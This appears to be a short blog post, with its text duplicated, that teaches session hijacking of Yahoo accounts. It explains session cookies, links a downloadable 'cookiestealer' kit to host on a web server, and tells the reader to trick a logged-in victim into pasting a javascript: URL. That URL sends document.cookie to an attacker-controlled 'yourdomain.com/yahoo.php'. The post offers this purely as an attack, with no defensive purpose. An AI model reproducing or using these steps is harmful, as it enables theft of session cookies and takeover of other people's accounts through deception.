The concept:
Whenever you log into your account(say yahoo for example) there is a small piece of random code generated called a cookie.
A copy of this cookie is stored on your system and the other goes to the server.
This cookie is used for authentication purpose for example, till the point of time you are logged in your account this piece of code is verified with the server whenever you perform some action.This helps in
authentication between you and the server.
Example:Just go to a yahoo login page and enter this particular code on the in place of the url
**javascript:alert(document.cookie);**
You will see a small random string generated.Now login into the yahoo account with the id and the password and put the same code again in the url you will find a bigger code.
That is nothing but the cookie for that particular session.
But remember that cookie is destroyed as soon as you log out.
Performing the hack:
step1:download this file
http://www.ziddu.com/download/16071128/cookiestealer.rar.html
step2:Now register for an web hosting site. Goto file manager and upload the 4 files(other than readme) and make another directory called cookies.
step 3:give this code to the victim while he is logged in and ask him to paste it in the url.
*******
javascript:document.location
='http://yourdomain.com/yahoo.php?ex='.concat
(escape(document.cookie));
*******
step 4:Now after performing the hack just open hacked.php..xD xD
Whenever you log into your account(say yahoo for example) there is a small piece of random code generated called a cookie.
A copy of this cookie is stored on your system and the other goes to the server.
This cookie is used for authentication purpose for example, till the point of time you are logged in your account this piece of code is verified with the server whenever you perform some action.This helps in
authentication between you and the server.
Example:Just go to a yahoo login page and enter this particular code on the in place of the url
**javascript:alert(document.cookie);**
You will see a small random string generated.Now login into the yahoo account with the id and the password and put the same code again in the url you will find a bigger code.
That is nothing but the cookie for that particular session.
But remember that cookie is destroyed as soon as you log out.
Performing the hack:
step1:download this file
http://www.ziddu.com/download/16071128/cookiestealer.rar.html
step2:Now register for an web hosting site. Goto file manager and upload the 4 files(other than readme) and make another directory called cookies.
step 3:give this code to the victim while he is logged in and ask him to paste it in the url.
*******
javascript:document.location
='http://yourdomain.com/yahoo.php?ex='.concat
(escape(document.cookie));
*******
step 4:Now after performing the hack just open hacked.php..xD xD
No comments:
Post a Comment